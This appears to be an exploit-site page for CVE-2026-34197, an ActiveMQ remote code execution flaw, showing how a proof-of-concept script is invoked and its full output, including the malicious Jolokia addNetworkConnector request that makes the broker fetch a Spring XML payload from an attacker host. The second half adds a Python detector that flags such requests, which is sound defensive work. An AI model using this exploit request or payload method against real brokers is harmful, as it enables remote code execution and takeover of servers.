## https://sploitus.com/exploit?id=830144AF-D83A-57E9-9EF4-75E12C45DA3D
# CVE-2026-34197
CVE-2026-34197 ActiveMQ PoC
PoC for ActiveMQ CVE-2026-34197, as per the Horizon3 post:
https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
```
krasn@icestorm cve-2026-34197-activemq % docker compose up -d
krasn@icestorm cve-2026-34197-activemq % python3 exploit_poc.py auto \
--target http://localhost:8161 \
--lhost 192.168.1.17 --lport 9999 \
--cmd "touch /tmp/blahblah.txt"
======================================================================
CVE-2026-34197 - ActiveMQ RCE via Jolokia + VM Transport
For authorized security testing and research only.
======================================================================
[*] Target: http://localhost:8161
[*] Command: touch /tmp/blahblah.txt
[*] Serving malicious Spring XML on http://0.0.0.0:9999/evil.xml
[+] Jolokia accessible - agent version: unknown
[*] Could not discover broker name, using default 'localhost'
[*] Sending exploit payload to http://localhost:8161/api/jolokia/
[*] Malicious URI: static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Jolokia returned 200 - exploit payload delivered
[+] Response: {
"request": {
"mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
"arguments": [
"static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)"
],
"type": "exec",
"operation": "addNetworkConnector(java.lang.String)"
},
"value": "NC",
"timestamp": 1775616523,
"status": 200
}
[*] Waiting 5s for target to fetch payload...
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Done. Verify command execution on target.
```
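
For detection, the Jolokia call echoed in the output above can be matched in HTTP bodies captured in front of the web console. The following is an added example, not part of the PoC repository or the Horizon3 post; it assumes you have the JSON body of a request to (or response from) `/api/jolokia/`, and the function names and the `broker-b.example.internal` peer are hypothetical.

```python
import json
import re
from urllib.parse import unquote

# vm:// transport URI whose brokerConfig option loads an xbean: resource.
VM_XBEAN = re.compile(r"vm://[^\s)]*?[?&]brokerConfig=xbean:([^\s)&]+)", re.I)

def jolokia_requests(doc):
    """Yield request objects from a single or bulk (list) Jolokia body; a
    response that echoes the call under "request" is unwrapped."""
    for item in doc if isinstance(doc, list) else [doc]:
        if isinstance(item, dict):
            inner = item.get("request")
            yield inner if isinstance(inner, dict) else item

def suspicious_connectors(body):
    """Return one finding per addNetworkConnector exec on an ActiveMQ MBean
    whose argument carries vm://...brokerConfig=xbean:<location>."""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []
    findings = []
    for req in jolokia_requests(doc):
        if str(req.get("type", "")).lower() != "exec":
            continue
        mbean, op = str(req.get("mbean", "")), str(req.get("operation", ""))
        if not (mbean.startswith("org.apache.activemq:") and op.startswith("addNetworkConnector")):
            continue
        for arg in req.get("arguments") or []:
            m = VM_XBEAN.search(unquote(str(arg)))  # also catches %-encoded args
            if m:
                loc = m.group(1)
                findings.append({"mbean": mbean, "location": loc,
                                 "remote": loc.lower().startswith(("http://", "https://"))})
    return findings

# Constructed samples: the echoed request from the output above (trimmed),
# and a routine connector pointing at a hypothetical peer broker.
POC_RESPONSE = json.dumps({"request": {
    "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
    "arguments": ["static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)"],
    "type": "exec", "operation": "addNetworkConnector(java.lang.String)"},
    "value": "NC", "status": 200})
ROUTINE = json.dumps({"type": "exec",
    "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
    "operation": "addNetworkConnector(java.lang.String)",
    "arguments": ["static:(tcp://broker-b.example.internal:61616)"]})

if __name__ == "__main__":
    for name, body in (("poc", POC_RESPONSE), ("routine", ROUTINE)):
        print(name, suspicious_connectors(body))
```

A finding with `remote` set means the broker was told to load its configuration from an HTTP(S) location, which matches the repeated `/evil.xml` fetches in the output above; pairing it with outbound HTTP from the broker host gives a second signal.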